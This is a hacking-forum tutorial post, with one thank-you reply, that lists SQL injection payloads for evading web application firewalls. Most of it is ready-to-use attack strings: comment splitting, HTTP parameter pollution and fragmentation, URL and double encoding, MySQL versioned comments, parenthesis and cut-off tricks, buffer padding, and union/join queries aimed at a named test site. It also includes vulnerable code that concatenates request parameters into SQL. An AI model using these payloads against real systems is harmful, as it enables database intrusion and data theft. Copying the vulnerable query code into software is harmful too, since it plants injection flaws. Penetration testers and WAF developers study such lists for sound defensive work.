Jump to content

Welcome to NulledBlog
Register now to gain access to all of our features. Once registered and logged in, you will be able to create topics, post replies to existing threads, give reputation to your fellow members, get your own private messenger, post status updates, manage your profile and so much more. If you already have an account, login here - otherwise create an account for free today!
Photo

[Tutorial] Full SQLi Waf Guide/Details

SQLi Waf Guide Details

  • Please log in to reply
1 reply to this topic

#1
TimeCenter

  • Offline
  • Hack The Time :D

  • Posts:
    79
    Reputation:
    5
    Joined:
    08 Jul, 2016
Today we will focus on the issue ' union select ' Waf Bypassing

#A# Bypassing WAF: SQL Injection - Normal Method

(1) of a vulnerability in the function of request Normalization.

• The following request doesn’t allow anyone to conduct an attack

 /?id=1+union+select+1,2,3/*


• If there is a corresponding vulnerability in the WAF, this request

will be successfully performed

 /?id=1/*union*/union/*select*/select+1,2,3/*


• After being processed by WAF, the request will become

 index.php?id=1/*uni X on*/union/*sel X ect*/select+1,2,3/*


The given example works in case of cleaning of dangerous traffic, not in case of blocking the entire request or the attack source.

(2) of a vulnerability in the function of request Normalization.

• Similarly, the following request doesn’t allow anyone to conduct an attack

 /?id=1+union+select+1,2,3/*


• If there is a corresponding vulnerability in the WAF, this request will be successfully performed

 /?id=1+un/**/ion+sel/**/ect+1,2,3--


• The SQL request will become

 SELECT * from table where id =1 union select 1,2,3--


Instead of construction /**/, any symbol sequence that WAF cuts off can be used .

The given example works in case of excessive cleaning of incoming data (replacement of a regular expression with the empty string).

(3) Using HTTP Parameter Pollution (HPP)

• The following request doesn’t allow anyone to conduct an attack

 /?id=1;select+1,2,3+from+users+where+id=1--


• This request will be successfully performed using HPP

 /?id=1;select+1&id=2,3+from+users+where+id=1--


Successful conduction of an HPP attack bypassing WAF depends on the environment of the application being attacked.

(4) Using HTTP Parameter Pollution (HPP)

• Vulnerable code

SQL=" select key from table where id= "+Request.QueryString("id")

• This request is successfully performed using the HPP technique

 /?id=1/**/union/*&id=*/select/*&id=*/pwd/*&id=*/from/*&id=*/users


• The SQL request becomes select key from table where

 id=1/**/union/*,*/select/*,*/pwd/*,*/from/*,*/users


ByPassing WAF: SQL Injection – HPF

Using HTTP Parameter Fragmentation (HPF)

• Vulnerable code example

 Query("select * from table where a=".$_GET['a']." and b=".$_GET['b']);
Query("select * from table where a=".$_GET['a']." and b=".$_GET['b']." limit".$_GET['c']);


• The following request doesn’t allow anyone to conduct an attack

 /?a=1+union+select+1,2/*


• These requests may be successfully performed using HPF

 /?a=1+union/*&b=*/select+1,2
/?a=1+union/*&b=*/select+1,pass/*&c=*/from+users--


• The SQL requests become

 select * from table where a=1 union/* and b=*/select 1,2
select * from table where a=1 union/* and b=*/select 1,pass/* limit */from users--


(5) Using distinct & distinctROW


+union+distinct+select+
+union+distinctROW+select+


+union%20distinct%20select+
+union%20%64istinctRO%57%20select+


(6) using [ HTTP encoding ] [ URL encoded WAF bypass Payload ] [ double encoding ]

if the waf blocks 'union' and 'select' together, so the way to bypass that is just use Union %23aa%0a Select.

[url encoded]
+%55nion %53elect %55nion(%53elect)


[Space (%20); #Most commonly used]
+union%20select%20


/%2A%2A/union/%2A%2A/select
%252f%252a*/UNION%252f%252a*/SELECT


[multi-line comments /**/] –

[id=999999.9%2F**%2FuNiOn%2F**%2FaLl%2F**%2FsElEcT%2F**%2F]

Multi-line comments start with /* and end with */.

Any text between /* and */ will be ignored by JavaScript.

%2F**%2Funion%2F**%2Fselect 


/**/UnIoN/**/SeLecT/**/
/*!50000Union*/ SeLEct
/*!50000UnIoN*/ /*!50000SeLeCt*/
/*!50000%55nIoN*/ /*!50000%53eLeCt*/
/**YmxhY2tyb3Nl**/UnIoN/**YmxhY2tyb3Nl**/SeLecT/**YmxhY2tyb3Nl**/


(7) using Parenthesis instead of space ()

+(uNioN)+(sElECt)
+union (select 1,2,3,4,5)
union(select(1),2,3,4,5)
union(select(1),(2),(3),(4),(5))
(-1)union(select(1),(2),(3),(4),(5))


1%')and(0)union(select(1),1,3,4,5,6)%23%23%23
union(select(0),version(),(0),(0),(0),(0))
UNION(SELECT/**_**/(1),2),(3),(4),(5),(6),(7),(8),(9))-- -


(8) using Cut-Off Techique

+UNunionION+SEselectLECT+


(9) using Variable Method | WAF after union select |

http://pastebin.com/8Xd7QrWK


(10) using routed query(double query) injection.

routed query(double query) injection, For that we will put a single quotation after the number of columns. Lets see

index.php?cat=1 and false UNION SELECT 1',2,3,4,5,6-- -

(here we have also got a sql error and we will also fix it to continue)

We have to bound the column number with double quotation(")

index.php?cat=1 and false UNION SELECT "1' -- -",2-- - (Error)
index.php?cat=1 and false UNION SELECT "1' -- -",2,3-- - (Error)
index.php?cat=1 and false UNION SELECT "1' -- -",2,3,4-- - (Error)
index.php?cat=1 and false UNION SELECT "1' -- -",2,3,4,5-- - (Error)
index.php?cat=1 and false UNION SELECT "1' -- -",2,3,4,5,6-- - (now query is fixed)

http://testphp.vulnw...s.php?artist=-1 UNION SELECT 1,2,3-- -",2,3,4,5,6-- -

let's see vedio for this meathod



(11) using JOIN syntaxes .

The INNER JOIN keyword selects all rows from both tables as long as there is a match between the columns in both tables.

http://testphp.vulnweb.com/artists.php?artist=-1 UNION SELECT 1,2,3-- -


After query UNION SELECT add *

artists.php?artist=-1 UNION SELECT *

then add FR0M

artists.php?artist=-1 UNION SELECT * FR0M

Then shut down each column brackets (select+1) then This column give him a nickname (select+1)a Then link between him and the ather column by JOIN like

artists.php?artist=-1 union select * from (select 1)a join (select 2)b join (select 3)c -- -


http://testphp.vulnweb.com/artists.php?artist=-1+union+select+*+from+(select+1)a+join+(select+2)b+join+(select+3)c -- -


(12) using Buffer Overflow .

the waf blocks 'union' and 'select' together [Forbidden], so the way to bypass that is just use Union %23aa%0a Select .

--%23%0a/*!50000union*/%23AAAAAAAA%0a/*!50000select*/%23AAAAAAAA%0a+


or use this method

+and (select 1)=(Select 0xAAAAAAAAAAAAAAAAAAAAA 1000 more A’s) then added befor union select like .


/*50000and*/(/*!50000%53elect*/ 1)=(/*!32302%53elect*/ 0xAAAAAA 1000 more A’s) /**/ /*!50000%union*/ /*!50000%53elect*/ 1,2,3-- - etc


(13) using Columns seperator Style WAF bypass .

if we bypassing union select but we get waf when added column number then we test it and added Columns seperator befor column number that have a waf like .

id=4'*2e9unioN Select!1,2%23
id=4'*2e9unioN Select!1,2,3%23
id=4'*2e9unioN Select!1,2,3,4%23
id=4'*2e9unioN Select!1,2,3,4,5%23


WAF after 3 columns lets use Columns seperator Style WAF bypass

Bypassed :- id=4'*2e9unioN Select!1,2,3,~4,5%23

  • 0

#2
miller88

  • Offline
  • Lurker

  • Posts:
    8
    Reputation:
    0
    Joined:
    22 Aug, 2016

thx bro


  • 0



Also tagged with one or more of these keywords: SQLi, Waf, Guide, Details

0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users